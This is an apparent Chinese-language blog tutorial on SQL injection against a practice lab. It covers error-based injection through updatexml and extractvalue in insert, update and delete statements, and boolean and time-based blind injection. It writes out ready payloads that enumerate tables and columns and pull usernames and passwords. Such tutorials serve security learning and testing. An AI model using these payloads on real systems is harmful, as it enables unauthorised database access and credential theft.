基于insert update delete

本文详细介绍如何利用SQL注入漏洞进行攻击,包括insert、update、delete注入等常见手法,并讲解了基于boolean及时间的盲注技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、基于insert update delete
在这里插入图片描述
得到同上的页面 存在insert漏洞
点击注册
在这里插入图片描述
现在用户名输入 单引号 ’
得到返回
在这里插入图片描述
用户名用单引号 密码随便填写 得到返回报错
在这里插入图片描述
得知后台是使用insert

后台相关操作如下:
在这里插入图片描述
采用or来构造闭合
使用updatexml来进行操作:

insert into member(username,pw,sex,phonenum,email,address) values(‘1’ or updatexml(1,concat(0x7e,database()),0) or ’ ‘ ,111111,1,2,3,4);
在这里插入图片描述
以上是在数据库中的演示

现在返回到注册界面
用户名填写
1’ or updatexml(1,concat(0x7e,database()),0) or ’
密码随便
可以得到database的值:
在这里插入图片描述
想要获取其他数据 只需更改database()的部分就可以了
update只需登陆之后 在更改用户信息那里填写:
1’ or updatexml(1,concat(0x7e,database()),0) or ’

二、delete注入
在这里插入图片描述
先随意添加两条留言 然后打开bp
随后删除一条留言
在这里插入图片描述
将其转移到repeater中
在这里插入图片描述
之后修改id 构造闭合
后台情况:
在这里插入图片描述
逻辑与之前一样:
在这里插入图片描述
在这里插入图片描述
可以通过自带的工具转换为url的格式
得到:
在这里插入图片描述
得到报错信息:在这里插入图片描述
三、extractvalue()报错函数
在这里插入图片描述

floor()函数是取整函数 但原理基本相同

四、基于boolean的盲注
第一步 测试
payload:’ and 1=1#(页面不变) | ’ and 1=2#(页面变化)
说明存在sql漏洞.
第二步 盲注
爆表:payload:’ and ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))>0#
爆字段:payload:’ and ascii(substr((select column_name from information_schema.columns where table_name=‘xxxx’ limit 0,1),1,1))>0#
爆数据: payload:’ and ascii(substr((select username,password from xxxx limit 0,1),1,1))>0#
然后一点一点猜。
基于时间的盲注
第一步:同上
第二步 盲注、
爆表:payload:’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=database()),1,1))>0,sleep(5),1)#
爆字段:payload:’ and if(ascii(substr((select column_name from information_schema.columns where table_name=‘xxxx’ limit 0,1),1,1))>0,sleep(5),1)#
爆数据:payload:’ and if(ascii(substr((select username,password from xxxx limit 0,1),1,1))>0,sleep(5),1)#

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值